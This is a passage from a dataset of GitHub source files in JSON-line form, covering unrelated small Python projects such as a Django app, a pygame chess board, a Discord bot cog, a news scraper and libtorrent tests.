halves\n\ndef compute_captcha2(captcha):\n result = 0\n\n halves = get_halfway(captcha)\n for num in halves:\n result += int(num)\n\n return result\n\ndef compute_captcha(captcha):\n result = 0\n\n matches = get_matches(captcha)\n for num in matches:\n result += int(num)\n\n return result\n\ndef get_matches(input_string):\n matches = []\n\n buff = input_string[-1]\n for char in input_string:\n if buff == char:\n matches.append(char)\n buff = char\n\n return matches\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zsmoore/Advent-Of-Code-2017","sub_path":"day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3336461073","text":"import django_filters\nfrom django_filters import *\nfrom .models import *\n\nclass OrderFilter(django_filters.FilterSet):\n start_date = DateFilter(field_name=\"date_created\", 
lookup_expr='gte')\n end_date = DateFilter(field_name=\"date_created\", lookup_expr='lte')\n notes = CharFilter(field_name=\"notes\", lookup_expr='icontains')\n class Meta:\n model = Order\n fields = '__all__'\n exclude = ['customer', 'date_created']\n\nclass ProductFilter(django_filters.FilterSet):\n #minimum_price = NumberFilter(field_name=\"price\", lookup_expr='gte')\n #maximum_price = NumberFilter(field_name=\"price\", lookup_expr='lte')\n sname = CharFilter(field_name=\"name\", lookup_expr='icontains')\n\n #minimum_price.label = \"Minimum Price\"\n #maximum_price.label = \"Maximum Price\"\n\n class Meta:\n model = Product\n fields = '__all__'\n exclude = ['name','price','description','date_created','image','tags','category']\n \n","repo_name":"gaurangt54/criczone","sub_path":"accounts/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22758909534","text":"# -*- coding: utf-8 -*-\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport numpy as np\nfrom matplotlib.backends.backend_pgf import FigureCanvasPgf\nfrom scipy.interpolate import spline\nmpl.backend_bases.register_backend('pdf', FigureCanvasPgf)\npgf_with_latex = {\n \"pgf.texsystem\": \"xelatex\", # use Xelatex which is TTF font aware\n}\n\nmpl.rcParams.update(pgf_with_latex)\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif', serif = 'CMU Serif', size = 12)\nplt.rcParams['text.latex.preamble'] = [\n r'\\usepackage{amsmath}',\n r'\\usepackage{amsfonts}',\n r'\\usepackage{graphicx}',\n r'\\usepackage[english,russian]{babel}',\n r'\\usepackage[utf8]{inputenc}',\n r'\\usepackage[T1]{fontenc}',\n ]\ng = np.genfromtxt('task2(exp).csv',delimiter=';')\nspline = np.genfromtxt('task2.csv',delimiter=';')\namount = g[:,0]\ntau = g[:,1]\nx1 = spline[0:,0]\ny1 = spline[0:,1]\nfig = plt.figure(figsize=(10,6))\nax = fig.add_subplot(121)\nax.grid(which='both')\nax.plot(x1,y1,color = '#FF7800', label = r'')\nax.errorbar(amount, tau, yerr=0.1, fmt=' ', color = '#FF7800', linewidth=2)\nax.tick_params(axis='x', direction='inout')\nax.tick_params(axis='y', direction='inout')\nax.set_xlabel(r'$N$, количество звеньев')\nax.set_ylabel(r'$\\tau$, мс')\nfig.savefig('task2.pdf')\nplt.show()\n","repo_name":"KirillPonur/filters","sub_path":"LC filters/plots/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18856795361","text":"# Figure out the shapes of intermediate layers produced by\n# mobilenet_v2\n# resnet50\n# From https://github.com/pytorch/vision/issues/3048\nimport torch\nimport torchvision\n\nprint(torchvision.__version__)\nprint(\"\")\n\nimport torchvision.models as models\n\nfrom torchvision.models._utils import IntermediateLayerGetter\n\nbackbone = models.mobilenet_v2(pretrained=None)\n\n# We won't use backbone.forward() anyway, because it's for classification\n# Have to call these sequentially then\n# https://pytorch.org/docs/stable/_modules/torchvision/models/mobilenet.html\nbackbone.layer1 = backbone.features[0:4]\nbackbone.layer2 = backbone.features[4:7]\nbackbone.layer3 = backbone.features[7:14]\nbackbone.layer4 = backbone.features[14:-1]\nbackbone.features = None\nbackbone.classifier = None\n\nreturn_layers = {\n \"layer2\": \"0\",\n \"layer3\": \"1\",\n \"layer4\": \"2\",\n} # they commented out layer1 in backbone.py\n\nbackbone2 = 
IntermediateLayerGetter(backbone, return_layers)\n\n\nx = torch.rand([1, 3, 512, 1024])\nres = backbone2(x)\n\nprint(\"\\nIntermediateLayerGetter mobilenet_v2 FMs\")\nfor k in res:\n print(k, res[k].shape)\n\nprint(\"\\nInitial mobilenet_v2 FMs\")\nm = models.mobilenet_v2()\na = torch.rand([1, 3, 512, 1024])\nfor i, l in enumerate(m.features):\n a = l(a)\n print(i, l.__class__.__name__, a.shape, end=\"\")\n if i in [3, 6, 13, 17]:\n print(\" <---- desired feature map layer?\")\n\n print(\"\")\n\n\n# Now try with resnet50, should produce same feature map dimensions\n# at some layers but with more channels\n# (resnet18 would be in between mobilenet_v2 and resnet50)\nprint(\"\\nr50 shape\")\n\nx = torch.rand([1, 3, 512, 1024])\nprint(\"x\", x.shape)\n\nr50 = torchvision.models.resnet50(pretrained=True)\nz = r50.conv1(x)\nz = r50.bn1(z)\nz = r50.relu(z)\nz = r50.maxpool(z)\n\n# Potential layers used as feature maps by Deformable-DETR\nprint(\"before layer1\", z.shape)\nz = r50.layer1(z)\nprint(\"after layer1\", z.shape)\nz = r50.layer2(z)\nprint(\"after layer2\", z.shape)\nz = r50.layer3(z)\nprint(\"after layer3\", z.shape)\nz = r50.layer4(z)\nprint(\"after layer4\", z.shape)\n","repo_name":"sethv/dl-dales-project","sub_path":"mobilenet_v2_r50_feature_maps.py","file_name":"mobilenet_v2_r50_feature_maps.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"19534554483","text":"import os.path\nfrom os import listdir\nfrom os.path import isfile, join\n\nimport pytz\nimport simplejson\nfrom django.core import serializers\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom django.utils import timezone\nfrom django.utils.datetime_safe import datetime\n\nfrom meta_reader.models import Source, Record\n\n\ndef index(request):\n \"\"\"\n Return the index page\n :param request: HTTPRequest\n :return: index page\n \"\"\"\n message = reload_sources()\n index_context = {\n 'status': message,\n 'records': Record.objects.all(),\n }\n return render(request, 'meta_reader/index.html', index_context)\n\n\ndef update(request):\n \"\"\"\n Get an updated list of records\n :param request: HttpRequest\n :return: List records in JSON\n \"\"\"\n message = reload_sources()\n \n records = Record.objects.all()\n \n data = serializers.serialize('json', records)\n \n index_context = {\n 'status': message,\n 'records': data,\n }\n \n return JsonResponse(index_context, safe=False)\n\n\ndef reload_sources():\n \"\"\"\n Return the records table\n :HttpResponse: Http Response message\n \"\"\"\n data_path = os.path.abspath(\"data/\")\n utc = pytz.UTC\n message = \"\"\n \n # Generate 2D array with first column is source name, 2nd column is source absolute path\n list_detected_sources = []\n for f in listdir(data_path):\n p = join(data_path, f);\n if isfile(p):\n list_detected_sources.append([f, p])\n \n # Delete non exist source\n tmp_lst = [x[0] for x in list_detected_sources]\n lst_all = Source.objects.all()\n \n list_source_not_found = lst_all.exclude(source_name__in=list(tmp_lst))\n list_source_not_found.delete()\n \n # Start to process each files in the data folder\n for iterator in list_detected_sources:\n update_flag = False;\n file_name = iterator[0]\n file_path = iterator[1]\n \n # Open file and process if file is correct\n with open(file_path, 'r') as data_file:\n current_date_modified = datetime.fromtimestamp(os.path.getmtime(file_path)).replace(tzinfo=utc)\n \n source, created = 
Source.objects.get_or_create(\n source_name=file_name,\n defaults=dict(source_name=file_name, date_added=datetime.now(timezone.utc),\n date_modified=current_date_modified),\n )\n \n source_date_modified = source.date_modified\n if created or source_date_modified != current_date_modified:\n update_flag = True # trigger update if create new source or date modified is changed\n \n # Import data\n if update_flag:\n try:\n data = simplejson.load(data_file)\n for o in data:\n tmp_date = datetime.strptime(o['date'], '%b %d, %Y %H:%M:%S').replace(tzinfo=utc)\n record = Record(\n source_id=file_name,\n date=tmp_date,\n filename=o[\"filename\"],\n action=o[\"action\"],\n rating=o[\"rating\"],\n submit_type=o[\"submit-type\"],\n )\n record.save()\n message += \"Update source {0} to database successfully\\n\".format(file_name)\n \n except Exception as e:\n message += \"Error when updating source {0} to database: {1}\\n\\n\".format(\n file_name,\n e\n )\n \n # Testing script to check Source insert success\n tmp_src = Source.objects.get(source_name=file_name)\n message += \"Source: {0}\\n • Date added: {1}\\n • Last modified: {2}\\n\".format(\n tmp_src.source_name,\n tmp_src.date_added.strftime('%b %d, %Y %H:%M:%S'),\n tmp_src.date_modified.strftime('%b %d, %Y %H:%M:%S'),\n )\n \n return message\n","repo_name":"berong91/Meta-data-reader","sub_path":"meta_reader/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
{"seq_id":"18295335950","text":"import pygame\nimport os\nimport time\nimport random\npygame.font.init()\n\nWIDTH, HEIGHT = 720, 720\nWIN = pygame.display.set_mode((WIDTH,HEIGHT))\npygame.display.set_caption(\"Chess - A2\")\n\nLIGHT_SQUARE = pygame.image.load(os.path.join(\"PicsA2\", \"light square.png\"))\nDARK_SQUARE = pygame.image.load(os.path.join(\"PicsA2\", \"dark square.png\"))\n\nLIGHT_PAWN = pygame.image.load(os.path.join(\"PicsA2\", \"light pawn.png\"))\nLIGHT_CASTLE = pygame.image.load(os.path.join(\"PicsA2\", \"light castle.png\"))\nLIGHT_KNIGHT = pygame.image.load(os.path.join(\"PicsA2\", \"light knight.png\"))\nLIGHT_BISHOP = pygame.image.load(os.path.join(\"PicsA2\", \"light bishop.png\"))\nLIGHT_QUEEN = pygame.image.load(os.path.join(\"PicsA2\", \"light queen.png\"))\nLIGHT_KING = pygame.image.load(os.path.join(\"PicsA2\", \"light king.png\"))\n\nDARK_PAWN = pygame.image.load(os.path.join(\"PicsA2\", \"dark pawn.png\"))\nDARK_CASTLE = pygame.image.load(os.path.join(\"PicsA2\", \"dark castle.png\"))\nDARK_KNIGHT = pygame.image.load(os.path.join(\"PicsA2\", \"dark knight.png\"))\nDARK_BISHOP = pygame.image.load(os.path.join(\"PicsA2\", \"dark bishop.png\"))\nDARK_QUEEN = pygame.image.load(os.path.join(\"PicsA2\", \"dark queen.png\"))\nDARK_KING = pygame.image.load(os.path.join(\"PicsA2\", \"dark king.png\"))\n\n\n\n\nclass Pieces:\n def __init__(self,x,y,moves=9):\n self.x = x\n self.y = y\n self.moves = moves\n self.piece_img = None\n \nclass Pawns(Pieces):\n COLOUR_MAP = {\n \"light\": (LIGHT_PAWN),\n \"dark\": (DARK_PAWN)\n }\n def __init__(self, x, y, colour, moves=9):\n super().__init__(x,y,moves)\n self.piece_img = self.COLOUR_MAP[colour] # look up the sprite for this colour\n\ndef background():\n scale = 90\n for x in range(0,4):\n for y in range (0,4):\n WIN.blit(LIGHT_SQUARE,(2*x*scale,2*y*scale))\n for x in range(1,5):\n for y in range (1,5):\n WIN.blit(LIGHT_SQUARE,(((2*x)-1)*scale,((2*y)-1)*scale))\n for x in range(1,5):\n for y in range (0,4):\n WIN.blit(DARK_SQUARE,((2*x-1)*scale,2*y*scale))\n for x in range(0,4):\n for y in range (1,5):\n WIN.blit(DARK_SQUARE,(2*x*scale,(2*y-1)*scale))\n pygame.display.update()\n \n\n\ndef set_up(light_pieces):\n COLOUR_MAP = {\n \"light\": (LIGHT_PAWN, LIGHT_CASTLE, LIGHT_KNIGHT, LIGHT_BISHOP, LIGHT_QUEEN, LIGHT_KING),\n \"dark\": (DARK_PAWN, DARK_CASTLE, DARK_KNIGHT, DARK_BISHOP, DARK_QUEEN, DARK_KING)\n }\n home_colour = random.choice([\"light\", \"dark\"])\n print(home_colour)\n\n#pawns\n for i in range (0,8): # eight pawns per side\n piece = Pawns(i*90,7*90, home_colour)\n light_pieces.append(piece)\n\n for piece in light_pieces:\n WIN.blit(piece.piece_img, (piece.x, piece.y))\n pygame.display.update() # push the newly drawn pieces to the screen\n\n\ndef main():\n light_pieces = []\n dark_pieces = []\n background()\n set_up(light_pieces)\n\nmain()\n","repo_name":"VinayPatelGitHub/ChessSimulator","sub_path":"Chess/chess A2.py","file_name":"chess A2.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
{"seq_id":"20719391712","text":"\n# Convenience functions to run a grid search over the classifiers and over K in KMeans\n\nimport itertools\n\nimport numpy as np\n\nimport sift_classifier as bow\nfrom 
sklearn.cluster import MiniBatchKMeans\nfrom sklearn.svm import SVC\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nimport warnings\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\nfrom datetime import datetime\n\ndef cluster_and_split(labeled_img_paths, y, K):\n \"\"\"Cluster into K clusters, then split into train/test/val\"\"\"\n # MiniBatchKMeans annoyingly throws tons of deprecation warnings that fill up the notebook. Ignore them.\n warnings.filterwarnings('ignore')\n\n X, cluster_model = bow.cluster_features(\n labeled_img_paths,\n cluster_model=MiniBatchKMeans(n_clusters=K)\n )\n\n warnings.filterwarnings('default')\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3)\n\n return X_train, X_test, y_train, y_test, cluster_model\n\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, cm[i, j],\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\n\ndef run_svm(X_train, X_test, y_train, y_test, scoring,\n c_vals=[0.5, 0.8, 1, 3], gamma_vals=[0.1, 0.01, 0.0001, 0.00001]):\n\n param_grid = [\n {'C': c_vals, 'kernel': ['linear']},\n #{'C': c_vals, 'gamma': gamma_vals, 'kernel': ['rbf']},\n ]\n\n print('start training svm', datetime.now())\n\n svc = GridSearchCV(SVC(), param_grid, n_jobs=-1, scoring='accuracy')\n #svc = SVC(C=0.9, kernel='linear')\n svc.fit(X_train, y_train)\n print('train score (%s):'%scoring, svc.score(X_train, y_train))\n test_score = svc.score(X_test, y_test)\n print('test score (%s):'%scoring, test_score)\n y_pred = svc.predict(X_test)\n print('best param for svm', svc.best_params_)\n print('best score for svm', svc.best_score_)\n \n\n mlp = MLPClassifier(hidden_layer_sizes=(10, 2))\n mlp.fit(X_train, y_train)\n print('train score (%s):'%scoring, mlp.score(X_train, y_train))\n test_score_mlp = mlp.score(X_test, y_test)\n print('test score (%s):'%scoring, test_score_mlp)\n \n d = pd.DataFrame([[\"SVM\", test_score*100], [\"MLP\", test_score_mlp*100]],\n columns=[\"Classifier\", 'Accuracy'])\n \n sns.set_color_codes(\"muted\")\n sns.barplot(x='Accuracy', y='Classifier', data=d, color=\"b\")\n\n plt.xlabel('Accuracy %')\n plt.title('Classifier Accuracy')\n plt.show()\n\n\n #print(svc.best_estimator_)\n\n return svc, test_score","repo_name":"vladimir-shirmanov/numbers","sub_path":"sift.py","file_name":"sift.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41640780803","text":"# coding:utf-8\nimport urllib.request, urllib.error\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport time\n\ndef get_sponsor_name(lists, sources):\n for 
element in lists:\n source = element.find_next(class_=\"sponsor-name\").string\n sources.append(source)\n return sources\n\nurls = ['https://newspicks.com/theme-news/technology/', 'https://newspicks.com/theme-news/business/', 'https://newspicks.com/theme-news/economic/', 'https://newspicks.com/theme-news/market/', 'https://newspicks.com/theme-news/education/', 'https://newspicks.com/theme-news/sports/', 'https://newspicks.com/theme-news/innovation/']\n\nfor url in urls:\n\n html = urllib.request.urlopen(url)\n soup = BeautifulSoup(html, \"html.parser\")\n\n titles = []\n sources = []\n\n page_name = soup.find(class_=\"page-name\").string\n right_box = soup.find_all(class_=\"right-box\")\n if not page_name in ['イノベーション', 'ジョブオファー']:\n for element in right_box:\n title = element.find_next('div').string\n titles.append(title)\n for element in right_box:\n source = element.find_next(class_='meta').find_next('div').string\n sources.append(source)\n\n news_cards = soup.find_all(class_=\"news-card\")\n news_cards_len = len(news_cards)\n for element in news_cards:\n title_link = element.find_next('a')\n title = title_link.find_next(class_=\"title\").string\n titles.append(title)\n\n publisher_containers = soup.find_all(class_=\"publisher-container\")\n containers_len = len(publisher_containers)\n for element in publisher_containers:\n source = element.find_next('span').string\n sources.append(source)\n\n if news_cards_len != containers_len:\n sources = get_sponsor_name(soup.find_all(class_=\"sponsored-container\"), sources)\n\n classes = {'ビジネス': 0, 'キャリア・教育': 1, '金融・マーケット': 2, 'イノベーション': 3, 'ジョブオファー': 4, '政治・経済': 5, '社会・スポーツ': 6, 'テクノロジー': 7}\n\n i = 0\n indexes = []\n themes = []\n for _ in range(len(titles)):\n themes.append(classes[page_name])\n i += 1\n indexes.append(i)\n\n df = pd.DataFrame({'index': indexes,\n 'title': titles,\n 'source': sources,\n 'theme': themes})\n df = df.set_index('index')\n\n file_names = {'テクノロジー': 'technology', 'ビジネス': 'business', '政治・経済': 'politics_economics', '金融・マーケット': 'finance_market', 'キャリア・教育': 'carrier_education', '社会・スポーツ': 'society_sports', 'イノベーション': 'innovation', 'ジョブオファー': 'others'}\n\n csv_name = './datasets/{}.csv'.format(file_names[page_name])\n df_origin = pd.read_csv(csv_name, index_col=0)\n\n df_new = pd.concat([df_origin, df])\n df_new = df_new.drop_duplicates(['title', 'source'])\n df_new = df_new.reset_index(drop=True)\n df_new.to_csv(csv_name, mode=\"w\")\n\n print(\"カテゴリー「{}」終わり\".format(page_name))\n time.sleep(1)\n","repo_name":"MasahiroKitazoe/text_clf","sub_path":"scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41015032999","text":"import discord\nfrom discord.ext import commands\nimport os, random\n\n\nclass BotOwner(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(\n name=\"kill\", brief=\"Shuts KaeBot down.\", description=\"Forces Kaebot to shutdown. Only usable by Bot Owner.\"\n )\n async def kill(self, ctx):\n if await self.bot.is_owner(ctx.author):\n await ctx.send(\"KaeBot signing out.\")\n await self.bot.kaedb.close()\n await self.bot.logout()\n else:\n await ctx.send(\"You lack the following permissions to do this:\\n```css\\nBot Owner\\n```\")\n\n @commands.command(\n name=\"restart\", brief=\"Restarts KaeBot.\", description=\"Restarts KaeBot. 
Only usable by Bot Owner.\"\n )\n async def restart(self, ctx):\n if await self.bot.is_owner(ctx.author):\n await ctx.send(\"Restarting...\")\n # hacky af BUT it works\n os.system(\"py KBRestartHax.py\")\n await self.bot.kaedb.close()\n await self.bot.logout()\n else:\n await ctx.send(\"You lack the following permissions to do this:\\n```css\\nBot Owner\\n```\")\n\n @commands.command(name=\"forceerror\", brief=\"...\", description=\"For testing. Bot Owner only.\", hidden=True)\n async def error(self, ctx):\n if await self.bot.is_owner(ctx.author):\n errortype = random.choice([ValueError(), IndexError(), KeyError(), AttributeError()])\n raise errortype\n else:\n await ctx.send(\"You lack the following permissions to do this:\\n```css\\nBot Owner\\n```\")\n\n @commands.command(name=\"exile\", brief=\"Stop bad users from accessing KaeBot.\",\n description=\"Stop bad users from accessing KaeBot.\")\n async def exile(self, ctx, user: discord.User):\n if await self.bot.is_owner(ctx.author):\n async with self.bot.kaedb.acquire() as conn:\n async with conn.transaction():\n if not await conn.fetchrow(\"SELECT * FROM exiled_users WHERE user_id = $1\", str(user.id)):\n await conn.execute(\"INSERT INTO exiled_users (user_id) VALUES ($1)\", str(user.id))\n await ctx.send(f\"{user.mention} has been exiled...\")\n else:\n await ctx.send(f\"{user.mention} has already been exiled.\")\n else:\n await ctx.send(\"You lack the following permissions to do this:\\n```css\\nBot Owner\\n```\")\n\n @commands.command(name=\"unexile\", brief=\"Allow exiles to use KaeBot again.\",\n description=\"Allow exiled users to use KaeBot again.\")\n async def unexile(self, ctx, user: discord.User):\n if await self.bot.is_owner(ctx.author):\n async with self.bot.kaedb.acquire() as conn:\n async with conn.transaction():\n if await conn.fetchrow(\"SELECT * FROM exiled_users WHERE user_id = $1\", str(user.id)):\n await conn.execute(\"DELETE FROM exiled_users WHERE user_id = $1\", str(user.id))\n await ctx.send(f\"{user.mention} has been welcomed back.\")\n else:\n await ctx.send(\"This user is not exiled.\")\n else:\n await ctx.send(\"You lack the following permissions to do this:\\n```css\\nBot Owner\\n```\")\n\n @commands.command(name=\"exilelist\", brief=\"View all exiled users.\",\n description=\"View all exiled users. 
Any user can use this command.\")\n    async def exilelist(self, ctx):\n        embed = discord.Embed(colour=discord.Color.from_rgb(81, 0, 124))\n        embed.set_footer(text=self.bot.KAEBOT_VERSION)\n        async with self.bot.kaedb.acquire() as conn:\n            async with conn.transaction():\n                exiles = await conn.fetch(\"SELECT * FROM exiled_users\")\n\n        embedcontent = \"\"\n        if not exiles:\n            embedcontent = \"No exiled users.\"\n        else:\n            for exile in exiles:\n                embedcontent += f\"{self.bot.get_user(int(exile['user_id'])).name}\\n\"\n        embed.add_field(name=\"Exiled users:\",\n                        value=embedcontent,\n                        inline=False)\n        await ctx.send(embed=embed)\n\n\ndef setup(bot):\n    bot.add_cog(BotOwner(bot))\n","repo_name":"TSHM-N/KaeBot","sub_path":"cogs/botowner.py","file_name":"botowner.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
{"seq_id":"43342536670","text":"import logging\nimport os.path\n\nfrom tools.utils.progress_utils import ProgressBar\nfrom tools.utils.cid_utils import ParameterData, Nodes, save_xml, get_updated_content\nfrom tools.utils.sql_utils import Connection\n\n\n# @dataclass(init=True, repr=False, eq=False, order=False, frozen=True)\n# class CopyCidOptions:\n# \"\"\"\n# Settings class\n# \"\"\"\n# base_path: str\n# source_cid: str\n# target_path: str\n# mask: str\n\n\nclass CopyCid:\n \"\"\"\n Main class for copying CID files\n \"\"\"\n _base_path: str\n _source_cid_path: str\n _target_path: str\n _mask: str\n\n def __init__(self, base_path: str, source_cid_path: str, target_path: str, mask: str):\n self._base_path = base_path\n self._source_cid_path = source_cid_path\n self._target_path = target_path\n self._mask = mask\n\n def _get_data_from_base(self) -> dict[str, list[tuple[ParameterData, str]]]:\n \"\"\"\n Load the data used for generation from the database\n :return: Dictionary with the values from the database\n \"\"\"\n with Connection.connect_to_mdb(self._base_path) as access_base:\n data: list[dict[str, str]] = access_base.retrieve_data_from_joined_table(\n table_name1='[МЭК 61850]',\n table_name2='[IED]',\n joined_fields=['IED_NAME'],\n fields=['ICD_PATH', 'IP', 'SENSR_TYPE', '[IED].IED_NAME'],\n key_names=None,\n key_values=None,\n uniq_values=True)\n data_for_xml: dict[str, list[tuple[ParameterData, str]]] = {}\n _, file_extension = os.path.splitext(self._source_cid_path)\n for value in data:\n file_name: str = self._target_path + value['ICD_PATH']\n if file_name[-4:].upper() not in ('.CID', '.ICD', 'SCD'):\n file_name = file_name + file_extension\n ip: str = value['IP']\n ied_name: str = value['[IED].IED_NAME']\n sensr_type: str = value['SENSR_TYPE']\n parameters: list[tuple[any, str]] = [(Nodes.IP.value, ip),\n (Nodes.MASK.value, self._mask),\n (Nodes.IEDNAME.value, ied_name),\n (Nodes.DESCR.value, sensr_type)]\n\n data_for_xml[file_name] = parameters\n return data_for_xml\n\n def create_files(self, data_for_xml: dict[str, list[tuple[ParameterData, str]]]) -> None:\n \"\"\"\n Copy the files\n :param data_for_xml: Database data with the property values\n :return: None\n \"\"\"\n ProgressBar.config(max_value=len(data_for_xml), step=1, prefix='Copying files', suffix='Done')\n for file in data_for_xml:\n data: bytes = get_updated_content(source_file_name=self._source_cid_path,\n parameters=data_for_xml[file])\n save_xml(xml_content=data, target_file_name=file)\n ProgressBar.update_progress()\n\n @staticmethod\n def run(base_path: str, source_cid_path: str, target_path: str, mask: str) -> None:\n logging.info('Starting the script...')\n copy_class: CopyCid = CopyCid(base_path=base_path,\n source_cid_path=source_cid_path,\n target_path=target_path,\n mask=mask)\n\n logging.info('Loading data from the database...')\n data_for_xml: dict[str, list[tuple[ParameterData, str]]] = copy_class._get_data_from_base()\n logging.info('Loading finished.')\n\n logging.info('Starting to copy the files...')\n copy_class.create_files(data_for_xml=data_for_xml)\n logging.info('Execution finished.')\n","repo_name":"dgefremov/PyGetTools","sub_path":"tools/copy_cid.py","file_name":"copy_cid.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
{"seq_id":"24586597657","text":"from __future__ import annotations\n\nimport asyncio\nfrom collections.abc import Sequence\nimport os\nimport pathlib\nimport tempfile\nimport unittest\n\nimport libtorrent as lt\n\nfrom tvaf import ltpy\n\nfrom . import lib\nfrom . import request_test_utils\n\n\nclass TestReadPiecesWithCancellation(request_test_utils.RequestServiceTestCase):\n    async def test_remove_before_start(self) -> None:\n        self.session.remove_torrent(self.handle)\n        # Ensure removal happened before we do read_pieces()\n        while await asyncio.to_thread(self.session.get_torrents):\n            pass\n        it = self.service.read_pieces(self.handle, self.all_pieces)\n        with self.assertRaises(ltpy.InvalidTorrentHandleError):\n            await asyncio.wait_for(it.__anext__(), 60)\n\n    async def test_remove_after_start(self) -> None:\n        # Schedule removal after we start read_pieces()\n        async def do_remove() -> None:\n            self.session.remove_torrent(self.handle)\n\n        asyncio.create_task(do_remove())\n        it = self.service.read_pieces(self.handle, self.all_pieces)\n        with self.assertRaises(ltpy.InvalidTorrentHandleError):\n            await asyncio.wait_for(it.__anext__(), 60)\n\n    async def test_shutdown(self) -> None:\n        async def do_close() -> None:\n            self.service.close()\n\n        asyncio.create_task(do_close())\n        it = self.service.read_pieces(self.handle, self.all_pieces)\n        with self.assertRaises(asyncio.CancelledError):\n            await asyncio.wait_for(it.__anext__(), 60)\n\n    async def test_file_error(self) -> None:\n        self.session.remove_torrent(self.handle)\n        # Create a file in tempdir, try to use it as the save_path\n        path = pathlib.Path(self.tempdir.name) / \"file.txt\"\n        await asyncio.to_thread(path.write_bytes, b\"\")\n        atp = self.torrent.atp()\n        atp.save_path = str(path)\n        self.handle = await asyncio.to_thread(\n            self.session.add_torrent, atp  # type: ignore\n        )\n        await self.feed_pieces()\n\n        it = self.service.read_pieces(self.handle, self.all_pieces)\n        with self.assertRaises(NotADirectoryError):\n            await asyncio.wait_for(it.__anext__(), 60)\n\n    # TODO: test de-prioritization\n\n\nclass TestReadPieces(request_test_utils.RequestServiceTestCase):\n    async def read(self, pieces: Sequence[int]) -> list[bytes]:\n        result: list[bytes] = []\n        it = self.service.read_pieces(self.handle, pieces)\n        async for piece in it:\n            result.append(piece)\n        return result\n\n    async def test_read_all(self) -> None:\n        await self.feed_pieces()\n        pieces = await asyncio.wait_for(self.read(self.all_pieces), 60)\n        self.assertEqual(pieces, self.torrent.pieces)\n\n    async def test_out_of_order(self) -> None:\n        await self.feed_pieces()\n        pieces = await asyncio.wait_for(self.read([1, 0]), 60)\n        self.assertEqual(pieces, [self.torrent.pieces[1], self.torrent.pieces[0]])\n\n    async def test_duplicates(self) -> None:\n        await self.feed_pieces()\n        pieces = await asyncio.wait_for(self.read([0, 0]), 60)\n        
self.assertEqual(pieces, [self.torrent.pieces[0], self.torrent.pieces[0]])\n\n @unittest.skip(\"flaky\")\n async def test_repetition(self) -> None:\n await self.feed_pieces()\n for _ in range(5):\n pieces = await asyncio.wait_for(self.read(self.all_pieces), 60)\n self.assertEqual(pieces, self.torrent.pieces)\n\n async def test_concurrent(self) -> None:\n task1 = asyncio.create_task(self.read(self.all_pieces))\n task2 = asyncio.create_task(self.read(self.all_pieces))\n await self.feed_pieces()\n pieces_list = await asyncio.wait_for(asyncio.gather(task1, task2), 60)\n for pieces in pieces_list:\n self.assertEqual(pieces, self.torrent.pieces)\n\n async def test_download(self) -> None:\n seed = lib.create_isolated_session_service().session\n seed_dir = await asyncio.to_thread(tempfile.TemporaryDirectory)\n try:\n atp = self.torrent.atp()\n atp.save_path = seed_dir.name\n atp.flags &= ~lt.torrent_flags.paused\n seed_handle = await asyncio.to_thread(seed.add_torrent, atp) # type: ignore\n # https://github.com/arvidn/libtorrent/issues/4980: add_piece()\n # while checking silently fails in libtorrent 1.2.8.\n await lib.wait_done_checking_or_error(seed_handle)\n for i, piece in enumerate(self.torrent.pieces):\n seed_handle.add_piece(i, piece, 0)\n\n self.handle.connect_peer((\"127.0.0.1\", seed.listen_port()))\n\n # The peer connection takes a long time, not sure why\n pieces = await asyncio.wait_for(self.read(self.all_pieces), 60)\n finally:\n await asyncio.to_thread(seed_dir.cleanup)\n self.assertEqual(pieces, self.torrent.pieces)\n\n async def test_read_checked_pieces(self) -> None:\n # write data to disk\n path = 